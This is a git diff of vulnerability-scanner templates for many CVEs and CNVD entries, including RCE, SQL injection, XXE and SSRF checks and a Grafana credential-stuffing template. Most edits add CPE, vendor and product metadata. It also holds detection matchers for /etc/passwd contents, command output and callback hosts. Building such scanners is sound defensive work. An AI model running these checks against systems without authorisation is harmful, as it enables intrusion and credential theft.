a/http/cnvd/2022/CNVD-2022-42853.yaml b/http/cnvd/2022/CNVD-2022-42853.yaml index af22b42117..34235794de 100644 --- a/http/cnvd/2022/CNVD-2022-42853.yaml +++ b/http/cnvd/2022/CNVD-2022-42853.yaml @@ -13,11 +13,14 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cwe-id: CWE-89 + cpe: cpe:2.3:a:easycorp:zentao:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.title:"zentao" fofa-query: "Zentao" + product: zentao + vendor: easycorp tags: cnvd,cnvd2022,zentao,sqli variables: num: "999999999" diff --git a/http/cnvd/2022/CNVD-2022-43245.yaml b/http/cnvd/2022/CNVD-2022-43245.yaml index 6d3542ad2c..3286cff038 100755 --- a/http/cnvd/2022/CNVD-2022-43245.yaml +++ b/http/cnvd/2022/CNVD-2022-43245.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 1 fofa-query: app="泛微-协同办公OA" + product: e-office + vendor: weaver tags: cnvd,cnvd2022,weaver,e-office,oa,lfi + classification: + cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:* http: - raw: - | diff --git a/http/cnvd/2024/CNVD-2024-15077.yaml b/http/cnvd/2024/CNVD-2024-15077.yaml index 204334b5b4..2148afb423 100644 --- a/http/cnvd/2024/CNVD-2024-15077.yaml +++ b/http/cnvd/2024/CNVD-2024-15077.yaml @@ -13,8 +13,12 @@ info: verified: true max-request: 1 fofa-query: title="AJ-Report" + product: aj-report + vendor: anji-plus tags: cnvd,cnvd2024,aj-report,rce + classification: + cpe: cpe:2.3:a:anji-plus:aj-report:*:*:*:*:*:*:*:* http: - raw: - | @@ -42,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a0ad6d10ef5ed64fff1a44a4efb42b8c18de347907d77e68fec2a9f796030e8c022003c9c9bcfc6d56d3a3c7988f48874841753487e2ce57d91740ffbe99e3627448:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a0ad6d10ef5ed64fff1a44a4efb42b8c18de347907d77e68fec2a9f796030e8c022003c9c9bcfc6d56d3a3c7988f48874841753487e2ce57d91740ffbe99e3627448:922c64590222798bb761d5b6d8e72950 diff --git a/http/credential-stuffing/self-hosted/grafana-login-check.yaml b/http/credential-stuffing/self-hosted/grafana-login-check.yaml index 935ab351a1..1a087cc186 100644 --- a/http/credential-stuffing/self-hosted/grafana-login-check.yaml +++ b/http/credential-stuffing/self-hosted/grafana-login-check.yaml @@ -11,7 +11,11 @@ info: max-request: 1 shodan-query: title:"Grafana" fofa-query: title="Grafana" + product: grafana + vendor: grafana tags: self-hosted,creds-stuffing,login-check,grafana + classification: + cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* variables: username: "{{username}}" password: "{{password}}" @@ -51,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a3f034e7179bdf079b1dc2684546e0aed572c531bfde778a670188f30ca5394d022100b2af74dbd182c70308b657aa3c1481e2b815a5c98dc49d5471f66cd4d4ccf527:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a3f034e7179bdf079b1dc2684546e0aed572c531bfde778a670188f30ca5394d022100b2af74dbd182c70308b657aa3c1481e2b815a5c98dc49d5471f66cd4d4ccf527:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2021/CVE-2021-27748.yaml b/http/cves/2021/CVE-2021-27748.yaml index cb7c631a8b..c081047007 100644 --- a/http/cves/2021/CVE-2021-27748.yaml +++ b/http/cves/2021/CVE-2021-27748.yaml @@ -16,10 +16,13 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27748 classification: cve-id: CVE-2021-27748 + cpe: cpe:2.3:a:ibm:websphere:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 shodan-query: http.html:"IBM WebSphere Portal" + product: websphere + vendor: ibm tags: cve2021,cve,hcl,ibm,ssrf,websphere flow: http(1) && http(2) @@ -52,4 +55,4 @@ http: part: body words: - "Interactsh Server" -# digest: 490a0046304402206c32c2de4201bdd15007eb3bf05d67820708447ab1c65ca0c81c782de9453dfb02202a678eb5d692039657fdff391b654c0bd3cb6c409e784102e62b31e77792bc22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206c32c2de4201bdd15007eb3bf05d67820708447ab1c65ca0c81c782de9453dfb02202a678eb5d692039657fdff391b654c0bd3cb6c409e784102e62b31e77792bc22:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2022/CVE-2022-29299.yaml b/http/cves/2022/CVE-2022-29299.yaml index 8c3bb457e5..60e8d19f3f 100644 --- a/http/cves/2022/CVE-2022-29299.yaml +++ b/http/cves/2022/CVE-2022-29299.yaml @@ -19,10 +19,13 @@ info: cve-id: CVE-2022-29299 epss-score: 0.00175 epss-percentile: 0.5456 + cpe: cpe:2.3:o:contec:solarview_compact_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.favicon.hash:-244067125 + product: solarview_compact_firmware + vendor: contec tags: cve2022,cve,xss,solarview,edb http: @@ -47,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207e67b78e313a0854050364c2e1cfe560e6122b0856e62f96e2084eef42c310af022100e7cf9ab5f3c28655a5ef30b6f0781cd53f721750c1efbe1ded28d9ef3c04ee03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207e67b78e313a0854050364c2e1cfe560e6122b0856e62f96e2084eef42c310af022100e7cf9ab5f3c28655a5ef30b6f0781cd53f721750c1efbe1ded28d9ef3c04ee03:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2023/CVE-2023-1434.yaml b/http/cves/2023/CVE-2023-1434.yaml index dc69545591..eef5e5cdf7 100644 --- a/http/cves/2023/CVE-2023-1434.yaml +++ b/http/cves/2023/CVE-2023-1434.yaml @@ -16,10 +16,13 @@ info: classification: cve-id: CVE-2023-1434 cwe-id: CWE-79 + cpe: cpe:2.3:a:odoo:odoo:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"Odoo" + product: odoo + vendor: odoo tags: cve2023,cve,odoo,xss http: @@ -45,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009f88c973f15e82b4aad7aedc75098b0daca742aa8b6fe3cfb11e203d2306539b022050fd604d6227ce671990eaac0780f3c69d00cd07567190bf96d24b10177fddb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009f88c973f15e82b4aad7aedc75098b0daca742aa8b6fe3cfb11e203d2306539b022050fd604d6227ce671990eaac0780f3c69d00cd07567190bf96d24b10177fddb3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2023/CVE-2023-24367.yaml b/http/cves/2023/CVE-2023-24367.yaml index 1b011a2903..763cbdbb04 100644 --- a/http/cves/2023/CVE-2023-24367.yaml +++ b/http/cves/2023/CVE-2023-24367.yaml @@ -21,10 +21,13 @@ info: cvss-score: 6.1 cve-id: CVE-2023-24367 cwe-id: CWE-79 + cpe: cpe:2.3:a:temenos:t24:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"T24 Sign in" + product: t24 + vendor: temenos tags: cve,cve2023,xss,temenos http: @@ -44,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022033b69b2049b77b79bff8923e0b2836cfb3bc43936f97dafe967844b6ed0b1e8202207725979487954c483e54d3ffe8efa55af50f0cab8fb65c02236cd81e27325c6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022033b69b2049b77b79bff8923e0b2836cfb3bc43936f97dafe967844b6ed0b1e8202207725979487954c483e54d3ffe8efa55af50f0cab8fb65c02236cd81e27325c6e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2023/CVE-2023-32117.yaml b/http/cves/2023/CVE-2023-32117.yaml index 33a11b3363..ca73e77bda 100644 --- a/http/cves/2023/CVE-2023-32117.yaml +++ b/http/cves/2023/CVE-2023-32117.yaml @@ -16,10 +16,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L cvss-score: 7.3 cve-id: CVE-2023-32117 + cpe: cpe:2.3:a:softlabbd:integrate_google_drive:*:*:*:*:wordpress:*:*:* metadata: verified: true max-request: 1 publicwww-query: "/wp-content/plugins/integrate-google-drive/" + product: integrate_google_drive + vendor: softlabbd tags: cve,cve2023,wordpress,wpscan,wp-plugin,wp,integrate-google-drive http: @@ -46,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220720cc9500eac10bd738c6689a1daa0de0eb4dc2a5c2f69d6dc28a5295eaf444302202d0f5786f6935f70b2633f6c4e75192c4ca7f04afc7ec34d4835dced5c34fbfe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220720cc9500eac10bd738c6689a1daa0de0eb4dc2a5c2f69d6dc28a5295eaf444302202d0f5786f6935f70b2633f6c4e75192c4ca7f04afc7ec34d4835dced5c34fbfe:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2023/CVE-2023-34020.yaml b/http/cves/2023/CVE-2023-34020.yaml index 95255a6a06..cb75263d2e 100644 --- a/http/cves/2023/CVE-2023-34020.yaml +++ b/http/cves/2023/CVE-2023-34020.yaml @@ -17,10 +17,13 @@ info: cwe-id: CWE-601 epss-score: 0.00076 epss-percentile: 0.32361 + cpe: cpe:2.3:a:uncannyowl:uncanny_toolkit_for_learndash:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 publicwww-query: "/wp-content/plugins/uncanny-learndash-toolkit/" + product: uncanny_toolkit_for_learndash + vendor: uncannyowl tags: cve2023,cve,wordpress,uncanny-learndash-toolkit,wpscan,redirect http: @@ -33,4 +36,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4a0a0047304502201c291b8c777b1f2832181c0b177acec46e3a1864d8cda77bb5d56b7aabd0cf5d022100bb38f50f255d8d3fcea6bbe1d7bc2367500fee3c65ea13c990bc0c970a2f4934:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201c291b8c777b1f2832181c0b177acec46e3a1864d8cda77bb5d56b7aabd0cf5d022100bb38f50f255d8d3fcea6bbe1d7bc2367500fee3c65ea13c990bc0c970a2f4934:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2023/CVE-2023-42344.yaml b/http/cves/2023/CVE-2023-42344.yaml index 0d26ee5df4..b9744dd127 100644 --- a/http/cves/2023/CVE-2023-42344.yaml +++ b/http/cves/2023/CVE-2023-42344.yaml @@ -14,8 +14,12 @@ info: verified: true max-request: 2 fofa-query: "OpenCms-9.5.3" + product: opencms + vendor: alkacon tags: cve,cve2023,xxe,opencms + classification: + cpe: cpe:2.3:a:alkacon:opencms:*:*:*:*:*:*:*:* http: - method: POST path: @@ -36,4 +40,4 @@ http: - "root:.*:0:0:" - "invalidArgument" condition: and -# digest: 4b0a00483046022100f7dbfd49302b6ff73e5301cdb82e1fea60540cdbacb1e9a04069885d75bbc145022100c7ec2bc827d6116bdc018f12ea636664f6d8688600854967a7d4cc2734c100d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f7dbfd49302b6ff73e5301cdb82e1fea60540cdbacb1e9a04069885d75bbc145022100c7ec2bc827d6116bdc018f12ea636664f6d8688600854967a7d4cc2734c100d4:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2023/CVE-2023-47115.yaml b/http/cves/2023/CVE-2023-47115.yaml index 3eb22ac278..f17ac454ac 100644 --- a/http/cves/2023/CVE-2023-47115.yaml +++ b/http/cves/2023/CVE-2023-47115.yaml @@ -21,10 +21,13 @@ info: cvss-score: 7.1 cve-id: CVE-2023-47115 cwe-id: CWE-79 + cpe: cpe:2.3:a:humansignal:label_studio:*:*:*:*:*:*:*:* metadata: verified: true max-request: 6 shodan-query: http.favicon.hash:-1649949475 + product: label_studio + vendor: humansignal tags: cve,cve2023,xss,authenticated,intrusive,label-studio http: @@ -93,4 +96,4 @@ http: - "contains(header, 'text/html')" - 'contains(body, "")' condition: and -# digest: 4a0a00473045022100aa945f4d7cfc24ccc7b7a8f60b7f6330657b9143527d8c1a0d1c30afb5798fd80220611e10519bf2fd4257bf6911993b35e94fcacb89b616f16f50b98606dda06dac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100aa945f4d7cfc24ccc7b7a8f60b7f6330657b9143527d8c1a0d1c30afb5798fd80220611e10519bf2fd4257bf6911993b35e94fcacb89b616f16f50b98606dda06dac:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2023/CVE-2023-47218.yaml b/http/cves/2023/CVE-2023-47218.yaml index 2239074621..93fec3268c 100644 --- a/http/cves/2023/CVE-2023-47218.yaml +++ b/http/cves/2023/CVE-2023-47218.yaml @@ -19,10 +19,13 @@ info: cwe-id: CWE-77 epss-score: 0.00305 epss-percentile: 0.69699 + cpe: cpe:2.3:o:qnap:qts:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: ssl.cert.issuer.cn:"QNAP NAS",title:"QNAP Turbo NAS" + product: qts + vendor: qnap tags: cve,cve2023,qnap,qts,quts,rce,intrusive variables: file: '{{rand_base(6)}}' @@ -53,4 +56,4 @@ http: - 'contains_all(body_2, "uid=", "gid=")' - 'status_code == 200' condition: and -# digest: 4b0a00483046022100ec7d20f744003a1c2ed7444be98278cc629581cb5099e4b67f6e133003420223022100d3c72e77322b2b66a8cbdbb608afe345f84e1fb986d6f09ec3be65cb6654952c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ec7d20f744003a1c2ed7444be98278cc629581cb5099e4b67f6e133003420223022100d3c72e77322b2b66a8cbdbb608afe345f84e1fb986d6f09ec3be65cb6654952c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2023/CVE-2023-48777.yaml b/http/cves/2023/CVE-2023-48777.yaml index 0159236de2..95467a48d1 100644 --- a/http/cves/2023/CVE-2023-48777.yaml +++ b/http/cves/2023/CVE-2023-48777.yaml @@ -17,11 +17,14 @@ info: cwe-id: CWE-434 epss-score: 0.00054 epss-percentile: 0.21518 + cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:wordpress:*:*:* metadata: verified: true max-request: 4 framework: wordpress publicwww-query: "/wp-content/plugins/elementor/" + product: website_builder + vendor: elementor tags: cve,cve2023,elementor,file-upload,intrusive,rce,wpscan,wordpress,wp-plugin,authenticated variables: filename: "{{rand_base(6)}}" @@ -66,4 +69,4 @@ http: group: 1 regex: - 'admin\\\/admin\-ajax\.php","nonce":"([0-9a-z]+)"' -# digest: 4b0a004830460221008bf58aa24ddd3c56ea97495962a5596e8fb115ff791e778f798822b880762953022100e12cc588c2b1eb10312f7c33f124907aaea0088092f98148f02bb2622e8bd232:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008bf58aa24ddd3c56ea97495962a5596e8fb115ff791e778f798822b880762953022100e12cc588c2b1eb10312f7c33f124907aaea0088092f98148f02bb2622e8bd232:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-1071.yaml b/http/cves/2024/CVE-2024-1071.yaml index 9af7e23d84..b51c7fc12a 100644 --- a/http/cves/2024/CVE-2024-1071.yaml +++ b/http/cves/2024/CVE-2024-1071.yaml @@ -20,6 +20,7 @@ info: cwe-id: CWE-89 epss-score: 0.00063 epss-percentile: 0.26569 + cpe: cpe:2.3:a:ultimatemember:ultimate_member:*:*:*:*:wordpress:*:*:* metadata: verified: true max-request: 2 @@ -27,6 +28,8 @@ info: fofa-query: body="/wp-content/plugins/ultimate-member" publicwww-query: "/wp-content/plugins/ultimate-member/" zoomeye-query: app:"WordPress Ultimate Member Plugin" + product: ultimate_member + vendor: ultimatemember tags: cve,cve2024,ultimate-member,wpscan,wordpress,wp-plugin,sqli http: @@ -61,4 +64,4 @@ http: regex: - '"nonce":"([0-9a-z]+)"' internal: true -# digest: 490a0046304402204dce0d46e23a96c4332c7141fb7eebb00ac6384853aaf8343276fe89d847988a022015a2c24b11feaf9425e5dd850e00a5ccff4ee8901419f9226029090d885ac9b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204dce0d46e23a96c4332c7141fb7eebb00ac6384853aaf8343276fe89d847988a022015a2c24b11feaf9425e5dd850e00a5ccff4ee8901419f9226029090d885ac9b9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-1183.yaml b/http/cves/2024/CVE-2024-1183.yaml index ddaf958baa..80b6807a7e 100644 --- a/http/cves/2024/CVE-2024-1183.yaml +++ b/http/cves/2024/CVE-2024-1183.yaml @@ -16,10 +16,13 @@ info: cwe-id: CWE-601 epss-score: 0.00076 epss-percentile: 0.32361 + cpe: cpe:2.3:a:gradio_project:gradio:*:*:*:*:python:*:*:* metadata: verified: true max-request: 1 shodan-query: html:"__gradio_mode__" + product: gradio + vendor: gradio_project tags: cve,cve2024,ssrf,oast,gradio http: @@ -33,4 +36,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$' part: header -# digest: 4b0a004830460221008f8114233dc93d6f7f8756ef02b1f03954696a215009b10c4052a06421fe4250022100e565921ef3de19b35c2af7550b0d98f911333848805b11ad398ff151d6e4ce17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008f8114233dc93d6f7f8756ef02b1f03954696a215009b10c4052a06421fe4250022100e565921ef3de19b35c2af7550b0d98f911333848805b11ad398ff151d6e4ce17:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-1380.yaml b/http/cves/2024/CVE-2024-1380.yaml index 5b0fc54e84..efbe1e5c48 100644 --- a/http/cves/2024/CVE-2024-1380.yaml +++ b/http/cves/2024/CVE-2024-1380.yaml @@ -17,10 +17,13 @@ info: cve-id: CVE-2024-1380 epss-score: 0.00043 epss-percentile: 0.0866 + cpe: cpe:2.3:a:relevanssi:relevanssi:*:*:*:*:wordpress:*:*:* metadata: verified: true max-request: 1 fofa-query: "/wp-content/plugins/relevanssi/" + product: relevanssi + vendor: relevanssi tags: cve,cve2024,wp,wordpress,wp-plugin,relevanssi,exposure http: @@ -39,4 +42,4 @@ http: - 'contains_all(header, "filename=relevanssi_log.csv", "application/download")' - 'contains_all(body, "user_id", "session_id")' condition: and -# digest: 4a0a00473045022100fdca94211d49feac7affb79d5d4723404f97a0eec77a19696bfa855f008e7dd1022072ff0b48f53ad24ed15f081f510ce1875c489798ee413e581239d13760f79e45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fdca94211d49feac7affb79d5d4723404f97a0eec77a19696bfa855f008e7dd1022072ff0b48f53ad24ed15f081f510ce1875c489798ee413e581239d13760f79e45:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-1561.yaml b/http/cves/2024/CVE-2024-1561.yaml index 121d42149c..d41d7ccd7c 100644 --- a/http/cves/2024/CVE-2024-1561.yaml +++ b/http/cves/2024/CVE-2024-1561.yaml @@ -24,10 +24,13 @@ info: cwe-id: CWE-29 epss-score: 0.00087 epss-percentile: 0.36659 + cpe: cpe:2.3:a:gradio_project:gradio:*:*:*:*:python:*:*:* metadata: verified: true max-request: 2 shodan-query: html:"__gradio_mode__" + product: gradio + vendor: gradio_project tags: cve,cve2024,intrusive,unauth,gradio,lfi,lfr http: @@ -75,4 +78,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d26a144630e68bc8d64abcccd82c53e14154407cbcf7058289120c90ce084843022100ad2abb54f6a71476ef38fc22bad77ecafebbd737a9c4e6ee6393d9b248ac30cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d26a144630e68bc8d64abcccd82c53e14154407cbcf7058289120c90ce084843022100ad2abb54f6a71476ef38fc22bad77ecafebbd737a9c4e6ee6393d9b248ac30cb:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-1698.yaml b/http/cves/2024/CVE-2024-1698.yaml index 0ac2a8f733..46eb52df95 100644 --- a/http/cves/2024/CVE-2024-1698.yaml +++ b/http/cves/2024/CVE-2024-1698.yaml @@ -18,10 +18,13 @@ info: cve-id: CVE-2024-1698 epss-score: 0.00045 epss-percentile: 0.12615 + cpe: cpe:2.3:a:wpdeveloper:notificationx:*:*:*:*:wordpress:*:*:* metadata: verified: true max-request: 1 fofa-query: body="/wp-content/plugins/notificationx" + product: notificationx + vendor: wpdeveloper tags: cve,cve2024,wpscan,wordpress,wp-plugin,notificationx,sqli http: @@ -42,4 +45,4 @@ http: - 'contains(body, "{\"success\":true}")' - 'contains(header, "application/json")' condition: and -# digest: 4b0a00483046022100c540c6618eec71e1ca2bfe0390511862cb1406910ae47308d1ac8e5ed4ac970d022100a17afc37ddb9e3def3f0dded90b0c6c2568bf12a2dc434ac2df90c467935de4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c540c6618eec71e1ca2bfe0390511862cb1406910ae47308d1ac8e5ed4ac970d022100a17afc37ddb9e3def3f0dded90b0c6c2568bf12a2dc434ac2df90c467935de4f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-20767.yaml b/http/cves/2024/CVE-2024-20767.yaml index 045458e095..1d3b4eb9b2 100644 --- a/http/cves/2024/CVE-2024-20767.yaml +++ b/http/cves/2024/CVE-2024-20767.yaml @@ -19,10 +19,13 @@ info: cwe-id: CWE-284 epss-score: 0.08221 epss-percentile: 0.94345 + cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: http.component:"Adobe ColdFusion" + product: coldfusion + vendor: adobe tags: cve,cve2024,adobe,coldfusion,lfr http: @@ -53,4 +56,4 @@ http: regex: - "(.*)" internal: true -# digest: 4a0a004730450220203c669fae6e243c8b45e754f6caba7ed4706fef525376c00d09efea9698b787022100ada2f1608d93dcf71799ce34f986e34f83dcd70a2d7ffa05f89dbec7fd0f7b0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220203c669fae6e243c8b45e754f6caba7ed4706fef525376c00d09efea9698b787022100ada2f1608d93dcf71799ce34f986e34f83dcd70a2d7ffa05f89dbec7fd0f7b0f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-21683.yaml b/http/cves/2024/CVE-2024-21683.yaml index 98f36fa39e..3cb8a12a21 100644 --- a/http/cves/2024/CVE-2024-21683.yaml +++ b/http/cves/2024/CVE-2024-21683.yaml @@ -19,10 +19,13 @@ info: cwe-id: CWE-78 epss-score: 0.00043 epss-percentile: 0.0866 + cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 fofa-query: "app=\"ATLASSIAN-Confluence\"" + product: confluence_data_center + vendor: atlassian tags: cve,cve2024,atlassian,confluence,rce,authenticated,intrusive variables: username: "{{username}}" @@ -69,4 +72,4 @@ http: - contains(interactsh_protocol, 'dns') - contains(body_3, "confluence") condition: and -# digest: 4b0a00483046022100c28962a7e265cc6de6b2f4ff178c62e7cf092b4f48154a8007dbd880ce7ebb64022100c14be3544d81d99ae0f2196c504637e743b2148ad6f655ef7c311cbb8f7419a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c28962a7e265cc6de6b2f4ff178c62e7cf092b4f48154a8007dbd880ce7ebb64022100c14be3544d81d99ae0f2196c504637e743b2148ad6f655ef7c311cbb8f7419a5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-23163.yaml b/http/cves/2024/CVE-2024-23163.yaml index 47b6381744..5182c969a0 100644 --- a/http/cves/2024/CVE-2024-23163.yaml +++ b/http/cves/2024/CVE-2024-23163.yaml @@ -16,12 +16,14 @@ info: cvss-score: 9.8 cve-id: CVE-2024-23163 cwe-id: CWE-287 + cpe: cpe:2.3:a:gestsup:gestsup:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: gestsup fofa-query: title="GestSup" shodan-query: http.favicon.hash:-283003760 + product: gestsup tags: cve,cve2024,account-takeover,gestsup variables: @@ -58,4 +60,4 @@ http: dsl: - '"Firstname: "+ firstname' - '"Lastname: "+ lastname' -# digest: 490a0046304402205e651225d6d683e62d175bbb93774c7608f54620faf0ea3301776bbb76b043790220374db3481988b620d8025f3cf128c9f5bceb7e3d304460bd868c53518df3f050:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205e651225d6d683e62d175bbb93774c7608f54620faf0ea3301776bbb76b043790220374db3481988b620d8025f3cf128c9f5bceb7e3d304460bd868c53518df3f050:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-24809.yaml b/http/cves/2024/CVE-2024-24809.yaml index 5f5d067b3f..b746ae2e7c 100644 --- a/http/cves/2024/CVE-2024-24809.yaml +++ b/http/cves/2024/CVE-2024-24809.yaml @@ -17,10 +17,13 @@ info: cwe-id: CWE-27 epss-score: 0.00043 epss-percentile: 0.09551 + cpe: cpe:2.3:a:traccar:traccar:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: html:"Traccar" + product: traccar + vendor: traccar tags: cve,cve2024,traccar,rce,intrusive,file-upload variables: @@ -158,4 +161,4 @@ http: - type: dsl dsl: - status_code == 200 -# digest: 4a0a004730450221009ea2576a2d60c30f0a45644e909ded239208a5bcc14d8de34343b264c0f1fee3022038cb35e1781ab439d0da65360a05b976673d71905790779eccab1077d3e0b6c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009ea2576a2d60c30f0a45644e909ded239208a5bcc14d8de34343b264c0f1fee3022038cb35e1781ab439d0da65360a05b976673d71905790779eccab1077d3e0b6c3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-27199.yaml b/http/cves/2024/CVE-2024-27199.yaml index feb849520c..7cf65d95dc 100644 --- a/http/cves/2024/CVE-2024-27199.yaml +++ b/http/cves/2024/CVE-2024-27199.yaml @@ -13,10 +13,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L cvss-score: 7.3 cwe-id: CWE-23 + cpe: cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 shodan-query: http.component:"TeamCity" + product: teamcity + vendor: jetbrains tags: cve,cve2024,teamcity,jetbrains,auth-bypass http: @@ -34,4 +37,4 @@ http: - 'contains(header, "text/html")' - 'contains_all(body, "Debug Logging", "CPU & Memory Usage")' condition: and -# digest: 490a0046304402207d46ec6991f8498ff8c74ec6ebfe0f59f19210620cab88c23c7761c7701b640102201246e4baea4f5b436b45be21c4f66bbe35e8a5f3769b78de38ee94253f331fa7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207d46ec6991f8498ff8c74ec6ebfe0f59f19210620cab88c23c7761c7701b640102201246e4baea4f5b436b45be21c4f66bbe35e8a5f3769b78de38ee94253f331fa7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-27564.yaml b/http/cves/2024/CVE-2024-27564.yaml index df793f0dbb..869e007356 100644 --- a/http/cves/2024/CVE-2024-27564.yaml +++ b/http/cves/2024/CVE-2024-27564.yaml @@ -13,8 +13,12 @@ info: verified: true max-request: 2 fofa-query: "title=\"ChatGPT个人专用版\"" + product: chatgpt_web + vendor: chanzhaoyu tags: cve,cve2024,chatgpt,ssrf,oast,oos,lfi + classification: + cpe: cpe:2.3:a:chanzhaoyu:chatgpt_web:*:*:*:*:*:*:*:* http: - method: GET path: @@ -38,4 +42,4 @@ http: - contains(header, "image/jpeg") - status_code == 200 condition: and -# digest: 490a0046304402205ae8c7b8e367577b1052683aa4b48d038bc2308c7299d24c0f6530b33b0ac9af022058dcc4c45ed777943b6e87ac9605afbd095f2bad41f6963d208ad6f85e702375:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205ae8c7b8e367577b1052683aa4b48d038bc2308c7299d24c0f6530b33b0ac9af022058dcc4c45ed777943b6e87ac9605afbd095f2bad41f6963d208ad6f85e702375:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-29269.yaml b/http/cves/2024/CVE-2024-29269.yaml index 7b7d08c32b..1f0c2ae15a 100644 --- a/http/cves/2024/CVE-2024-29269.yaml +++ b/http/cves/2024/CVE-2024-29269.yaml @@ -18,9 +18,12 @@ info: cve-id: CVE-2024-29269 epss-score: 0.00054 epss-percentile: 0.21518 + cpe: cpe:2.3:h:telesquare:tlr-2005ksh:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: title:"Login to TLR-2005KSH" + product: tlr-2005ksh + vendor: telesquare tags: cve,cve2024,telesquare,tlr,rce http: @@ -48,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008b5117d474664154b7b9b2b8f2c14284599c81fcbe172df27d9793b3b4a8d65602206c4b5689c81e4a2e53e1e5917aa6e6dd97595c1d5a8c1313772ee7aea8d2473d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 